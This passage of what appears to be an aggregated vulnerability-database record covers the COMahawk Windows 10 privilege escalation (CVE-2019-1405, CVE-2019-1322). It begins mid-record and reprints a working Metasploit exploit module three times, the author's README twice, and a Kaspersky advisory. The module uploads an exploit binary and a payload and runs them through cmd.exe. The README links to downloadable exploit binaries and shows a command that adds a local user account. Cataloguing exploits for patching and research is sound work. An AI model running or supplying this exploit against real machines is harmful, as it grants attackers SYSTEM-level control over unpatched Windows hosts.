#{exploit_path}\")\r\n\r\n # Upload Payload\r\n vprint_status(\"Uploading Payload\")\r\n ensure_clean_destination(payload_path)\r\n write_file(payload_path, payload_exe)\r\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\r\n print_warning(\"This exploit requires manual cleanup of the payload #{payload_path}\")\r\n\r\n # Run Exploit\r\n vprint_status(\"Running Exploit\")\r\n print_status(\"It may take a moment after the session is established for the exploit to exit safely.\")\r\n begin\r\n cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\", 60)\r\n rescue Rex::TimeoutError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(\"Caught timeout. Exploit may be taking longer or it may have failed.\")\r\n end\r\n vprint_status(\"Cleaning up #{exploit_path}\")\r\n ensure_clean_destination(exploit_path)\r\n end\r\n\r\n def validate_active_host\r\n begin\r\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n raise Msf::Exploit::Failed, 'Could not connect to session'\r\n end\r\n end\r\n\r\n def validate_target\r\n if sysinfo['Architecture'] == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\r\n end\r\n sysinfo_value = sysinfo['OS']\r\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\r\n vprint_status(\"Build Number = #{build_num}\")\r\n unless sysinfo_value =~ /10/ && (build_num > 17133 && build_num < 18362)\r\n fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')\r\n end\r\n end\r\n\r\n def ensure_clean_destination(path)\r\n return unless file?(path)\r\n print_status(\"#{path} already exists on the target. Deleting...\")\r\n begin\r\n file_rm(path)\r\n print_status(\"Deleted #{path}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(\"Unable to delete #{path}\")\r\n end\r\n end\r\nend\n\n# 0day.today [2019-12-19] #", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33685"}, {"lastseen": "2019-12-04T03:59:24", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2019-11-14T00:00:00", "title": "Microsoft Windows 10 Build 1803 < 1903 - (COMahawk) Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1322", "CVE-2019-1405"], "modified": "2019-11-14T00:00:00", "id": "1337DAY-ID-33566", "href": "https://0day.today/exploit/description/33566", "sourceData": "## EDB Note\r\nDownload:\r\n- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-1.exe\r\n- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-2.zip\r\n\r\n\r\n# COMahawk\r\n**Privilege Escalation: Weaponizing CVE-2019-1405 and CVE-2019-1322**\r\n\r\n## Video Demo\r\nhttps://vimeo.com/373051209\r\n\r\n## Usage\r\n\r\n### Compile or Download from Release (https://github.com/apt69/COMahawk/releases)\r\n\r\n1. Run COMahawk.exe\r\n2. ???\r\n3. Hopefully profit\r\n\r\nor\r\n\r\n1. COMahawk.exe \"custom command to run\" (ie. COMahawk.exe \"net user /add test123 lol123 &\")\r\n2. ???\r\n3. Hopefully profit\r\n\r\n## Concerns\r\n**MSDN mentioned that only 1803 to 1903 is vulnerable to CVE-2019-1322. If it doesn't work, maybe it was patched.**\r\n\r\nHowever, it is confirmed that my 1903 does indeed have this bug so maybe it was introduced somewhere inbetween. YMMV.\r\n\r\nAlso, since you are executing from a service - you most likely cannot spawn any Window hence all command will be \"GUI-less\". Maybe different session? Idk, it is too late and I am tired haha.\r\n\r\n## Credits:\r\nhttps://twitter.com/leoloobeek for helping me even when he doesn't even have a laptop\r\n\r\nhttps://twitter.com/TomahawkApt69 for being the mental support and motivation\r\n\r\nand most of all:\r\n\r\nhttps://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/\r\n\r\nfor discovering and publishing the write up. 100% of the credit goes here.\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33566"}], "metasploit": [{"lastseen": "2021-01-01T05:15:15", "description": "This exploit uses two vulnerabilities to execute a command as an elevated user. The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to NT AUTHORITY\\LOCAL SERVICE The second (CVE-2019-1322) leverages the Update Orchestrator Service to elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.\n", "published": "2019-12-10T01:09:15", "type": "metasploit", "title": "Microsoft UPnP Local Privilege Elevation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1322", "CVE-2019-1405"], "modified": "2020-12-07T10:31:45", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/COMAHAWK/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::Common\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft UPnP Local Privilege Elevation Vulnerability',\n 'Description' => %q(\n This exploit uses two vulnerabilities to execute a command as an elevated user.\n The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to\n NT AUTHORITY\\LOCAL SERVICE\n The second (CVE-2019-1322) leverages the Update Orchestrator Service to\n elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'NCC Group', # Original discovery (https://www.nccgroup.trust/uk/)\n 'hoangprod', # PoC\n 'bwatters-r7' # msf module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Targets' =>\n [\n ['Windows x64', { 'Arch' => ARCH_X64 }]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-11-12',\n 'References' =>\n [\n ['CVE', '2019-1322'],\n ['CVE', '2019-1405'],\n ['EDB', '47684'],\n ['URL', 'https://github.com/apt69/COMahawk'],\n ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],\n ['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']\n ],\n 'DefaultOptions' =>\n {\n 'DisablePayloadHandler' => false\n }\n ))\n\n register_options([\n OptString.new('EXPLOIT_NAME',\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\n OptString.new('PAYLOAD_NAME',\n [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),\n OptString.new('WRITABLE_DIR',\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\n OptInt.new('EXPLOIT_TIMEOUT',\n [true, 'The number of seconds to wait for exploit to finish running', 60]),\n OptInt.new('EXECUTE_DELAY',\n [true, 'The number of seconds to delay between file upload and exploit launch', 3])\n ])\n end\n\n def exploit\n exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)\n payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)\n exploit_name = \"#{exploit_name}.exe\" unless exploit_name.end_with?('.exe')\n payload_name = \"#{payload_name}.exe\" unless payload_name.end_with?('.exe')\n temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')\n payload_path = \"#{temp_path}\\\\#{payload_name}\"\n exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\n payload_exe = generate_payload_exe\n\n # Check target\n vprint_status(\"Checking Target\")\n validate_active_host\n validate_target\n fail_with(Failure::BadConfig, \"#{temp_path} does not exist on the target\") unless directory?(temp_path)\n\n # Upload Exploit\n vprint_status(\"Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}\")\n ensure_clean_destination(exploit_path)\n exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe')\n write_file(exploit_path, exploit_bin)\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\n\n # Upload Payload\n vprint_status(\"Uploading Payload\")\n ensure_clean_destination(payload_path)\n write_file(payload_path, payload_exe)\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\n print_warning(\"This exploit requires manual cleanup of the payload #{payload_path}\")\n\n # Run Exploit\n vprint_status(\"Running Exploit\")\n print_status(\"It may take a moment after the session is established for the exploit to exit safely.\")\n begin\n cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\", 60)\n rescue Rex::TimeoutError => e\n elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)\n print_error(\"Caught timeout. Exploit may be taking longer or it may have failed.\")\n end\n vprint_status(\"Cleaning up #{exploit_path}\")\n ensure_clean_destination(exploit_path)\n end\n\n def validate_active_host\n begin\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog('Could not connect to session', error: e)\n raise Msf::Exploit::Failed, 'Could not connect to session'\n end\n end\n\n def validate_target\n if sysinfo['Architecture'] == ARCH_X86\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\n end\n sysinfo_value = sysinfo['OS']\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Build Number = #{build_num}\")\n unless sysinfo_value =~ /10/ && (build_num > 17133 && build_num < 18362)\n fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')\n end\n end\n\n def ensure_clean_destination(path)\n return unless file?(path)\n print_status(\"#{path} already exists on the target. Deleting...\")\n begin\n file_rm(path)\n print_status(\"Deleted #{path}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(e)\n print_error(\"Unable to delete #{path}\")\n end\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/comahawk.rb"}, {"lastseen": "2020-10-15T07:45:12", "description": "This exploit uses two vulnerabilities to execute a command as an elevated user. The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to NT AUTHORITY\\LOCAL SERVICE The second (CVE-2019-1322) leverages the Update Orchestrator Service to elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.\n", "published": "2019-12-10T01:09:15", "type": "metasploit", "title": "Microsoft UPnP Local Privilege Elevation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1322", "CVE-2019-1405"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/COMAHAWK", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/common'\nrequire 'msf/core/post/file'\nrequire 'msf/core/post/windows/priv'\nrequire 'msf/core/post/windows/registry'\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::Common\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft UPnP Local Privilege Elevation Vulnerability',\n 'Description' => %q(\n This exploit uses two vulnerabilities to execute a command as an elevated user.\n The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to\n NT AUTHORITY\\LOCAL SERVICE\n The second (CVE-2019-1322) leverages the Update Orchestrator Service to\n elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'NCC Group', # Original discovery (https://www.nccgroup.trust/uk/)\n 'hoangprod', # PoC\n 'bwatters-r7' # msf module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Targets' =>\n [\n ['Windows x64', { 'Arch' => ARCH_X64 }]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-11-12',\n 'References' =>\n [\n ['CVE', '2019-1322'],\n ['CVE', '2019-1405'],\n ['EDB', '47684'],\n ['URL', 'https://github.com/apt69/COMahawk'],\n ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],\n ['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']\n ],\n 'DefaultOptions' =>\n {\n 'DisablePayloadHandler' => false\n }\n ))\n\n register_options([\n OptString.new('EXPLOIT_NAME',\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\n OptString.new('PAYLOAD_NAME',\n [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),\n OptString.new('WRITABLE_DIR',\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\n OptInt.new('EXPLOIT_TIMEOUT',\n [true, 'The number of seconds to wait for exploit to finish running', 60]),\n OptInt.new('EXECUTE_DELAY',\n [true, 'The number of seconds to delay between file upload and exploit launch', 3])\n ])\n end\n\n def exploit\n exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)\n payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)\n exploit_name = \"#{exploit_name}.exe\" unless exploit_name.end_with?('.exe')\n payload_name = \"#{payload_name}.exe\" unless payload_name.end_with?('.exe')\n temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')\n payload_path = \"#{temp_path}\\\\#{payload_name}\"\n exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\n payload_exe = generate_payload_exe\n\n # Check target\n vprint_status(\"Checking Target\")\n validate_active_host\n validate_target\n fail_with(Failure::BadConfig, \"#{temp_path} does not exist on the target\") unless directory?(temp_path)\n\n # Upload Exploit\n vprint_status(\"Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}\")\n ensure_clean_destination(exploit_path)\n exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe')\n write_file(exploit_path, exploit_bin)\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\n\n # Upload Payload\n vprint_status(\"Uploading Payload\")\n ensure_clean_destination(payload_path)\n write_file(payload_path, payload_exe)\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\n print_warning(\"This exploit requires manual cleanup of the payload #{payload_path}\")\n\n # Run Exploit\n vprint_status(\"Running Exploit\")\n print_status(\"It may take a moment after the session is established for the exploit to exit safely.\")\n begin\n cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\", 60)\n rescue Rex::TimeoutError => e\n elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)\n print_error(\"Caught timeout. Exploit may be taking longer or it may have failed.\")\n end\n vprint_status(\"Cleaning up #{exploit_path}\")\n ensure_clean_destination(exploit_path)\n end\n\n def validate_active_host\n begin\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog('Could not connect to session', error: e)\n raise Msf::Exploit::Failed, 'Could not connect to session'\n end\n end\n\n def validate_target\n if sysinfo['Architecture'] == ARCH_X86\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\n end\n sysinfo_value = sysinfo['OS']\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Build Number = #{build_num}\")\n unless sysinfo_value =~ /10/ && (build_num > 17133 && build_num < 18362)\n fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')\n end\n end\n\n def ensure_clean_destination(path)\n return unless file?(path)\n print_status(\"#{path} already exists on the target. Deleting...\")\n begin\n file_rm(path)\n print_status(\"Deleted #{path}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(e)\n print_error(\"Unable to delete #{path}\")\n end\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/comahawk.rb"}], "exploitpack": [{"lastseen": "2020-04-01T20:40:20", "description": "\nMicrosoft Windows 10 Build 1803 1903 - COMahawk Local Privilege Escalation", "edition": 1, "published": "2019-11-14T00:00:00", "title": "Microsoft Windows 10 Build 1803 1903 - COMahawk Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1322", "CVE-2019-1405"], "modified": "2019-11-14T00:00:00", "id": "EXPLOITPACK:35553BEFF42A94A5A731E9C926E550DD", "href": "", "sourceData": "##\u00a0EDB Note\nDownload:\n- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-1.exe\n- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-2.zip\n\n\n# COMahawk\n**Privilege Escalation: Weaponizing CVE-2019-1405 and CVE-2019-1322**\n\n## Video Demo\nhttps://vimeo.com/373051209\n\n## Usage\n\n### Compile or Download from Release (https://github.com/apt69/COMahawk/releases)\n\n1. Run COMahawk.exe\n2. ???\n3. Hopefully profit\n\nor\n\n1. COMahawk.exe \"custom command to run\" (ie. COMahawk.exe \"net user /add test123 lol123 &\")\n2. ???\n3. Hopefully profit\n\n## Concerns\n**MSDN mentioned that only 1803 to 1903 is vulnerable to CVE-2019-1322. If it doesn't work, maybe it was patched.**\n\nHowever, it is confirmed that my 1903 does indeed have this bug so maybe it was introduced somewhere inbetween. YMMV.\n\nAlso, since you are executing from a service - you most likely cannot spawn any Window hence all command will be \"GUI-less\". Maybe different session? Idk, it is too late and I am tired haha.\n\n## Credits:\nhttps://twitter.com/leoloobeek for helping me even when he doesn't even have a laptop\n\nhttps://twitter.com/TomahawkApt69 for being the mental support and motivation\n\nand most of all:\n\nhttps://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/\n\nfor discovering and publishing the write up. 100% of the credit goes here.", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T12:00:27", "bulletinFamily": "info", "cvelist": ["CVE-2019-1342", "CVE-2019-1336", "CVE-2019-1319", "CVE-2019-1060", "CVE-2019-1318", "CVE-2019-1341", "CVE-2019-1347", "CVE-2019-1322", "CVE-2019-1378", "CVE-2019-1321", "CVE-2019-1316", "CVE-2019-1326", "CVE-2019-1337", "CVE-2019-1359", "CVE-2019-1230", "CVE-2019-1166", "CVE-2019-1358", "CVE-2019-1311", "CVE-2019-1365", "CVE-2019-1340", "CVE-2019-1346", "CVE-2019-1344", "CVE-2019-1343", "CVE-2019-1345", "CVE-2019-1315", "CVE-2019-1323", "CVE-2019-1333", "CVE-2019-1368", "CVE-2019-1325", "CVE-2019-1320", "CVE-2019-1334", "CVE-2019-1339", "CVE-2019-1317"], "description": "### *Detect date*:\n10/08/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, gain privileges, spoof user interface, bypass security restrictions, cause denial of service, execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 for 32-bit Systems \nWindows 8.1 for 32-bit systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 1709 for ARM64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1903 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 10 Version 1703 for 32-bit Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 \nWindows 10 Version 1803 for x64-based Systems \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows RT 8.1 \nWindows 10 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2019 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server, version 1803 (Server Core Installation) \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Update Assistant\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2019-1337](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1337>) \n[CVE-2019-1334](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1334>) \n[CVE-2019-1322](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1322>) \n[CVE-2019-1319](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1319>) \n[CVE-2019-1318](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1318>) \n[CVE-2019-1341](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1341>) \n[CVE-2019-1368](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1368>) \n[CVE-2019-1378](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1378>) \n[CVE-2019-1315](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1315>) \n[CVE-2019-1345](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1345>) \n[CVE-2019-1230](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1230>) \n[CVE-2019-1340](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1340>) \n[CVE-2019-1316](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1316>) \n[CVE-2019-1365](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1365>) \n[CVE-2019-1166](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1166>) \n[CVE-2019-1344](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1344>) \n[CVE-2019-1343](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1343>) \n[CVE-2019-1339](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1339>) \n[CVE-2019-1317](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1317>) \n[CVE-2019-1342](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1342>) \n[CVE-2019-1346](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1346>) \n[CVE-2019-1320](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1320>) \n[CVE-2019-1323](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1323>) \n[CVE-2019-1333](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1333>) \n[CVE-2019-1347](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1347>) \n[CVE-2019-1321](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1321>) \n[CVE-2019-1358](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1358>) \n[CVE-2019-1325](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1325>) \n[CVE-2019-1326](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1326>) \n[CVE-2019-1336](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1336>) \n[CVE-2019-1359](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1359>) \n[CVE-2019-1060](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1060>) \n[CVE-2019-1311](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1311>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2019-1318](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1318>)0.0Unknown \n[CVE-2019-1339](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1339>)0.0Unknown \n[CVE-2019-1368](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1368>)0.0Unknown \n[CVE-2019-1311](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1311>)0.0Unknown \n[CVE-2019-1340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1340>)0.0Unknown \n[CVE-2019-1326](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1326>)0.0Unknown \n[CVE-2019-1346](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1346>)0.0Unknown \n[CVE-2019-1344](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1344>)0.0Unknown \n[CVE-2019-1337](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1337>)0.0Unknown \n[CVE-2019-1320](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1320>)0.0Unknown \n[CVE-2019-1230](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1230>)0.0Unknown \n[CVE-2019-1336](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1336>)0.0Unknown \n[CVE-2019-1322](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1322>)0.0Unknown \n[CVE-2019-1060](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1060>)0.0Unknown \n[CVE-2019-1321](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1321>)0.0Unknown \n[CVE-2019-1315](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1315>)0.0Unknown \n[CVE-2019-1166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1166>)0.0Unknown \n[CVE-2019-1333](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1333>)0.0Unknown \n[CVE-2019-1319](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1319>)0.0Unknown \n[CVE-2019-1334](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1334>)0.0Unknown \n[CVE-2019-1345](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1345>)0.0Unknown \n[CVE-2019-1341](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1341>)0.0Unknown \n[CVE-2019-1323](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1323>)0.0Unknown \n[CVE-2019-1347](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1347>)0.0Unknown \n[CVE-2019-1365](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1365>)0.0Unknown \n[CVE-2019-1359](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1359>)0.0Unknown \n[CVE-2019-1342](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1342>)0.0Unknown \n[CVE-2019-1316](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1316>)0.0Unknown 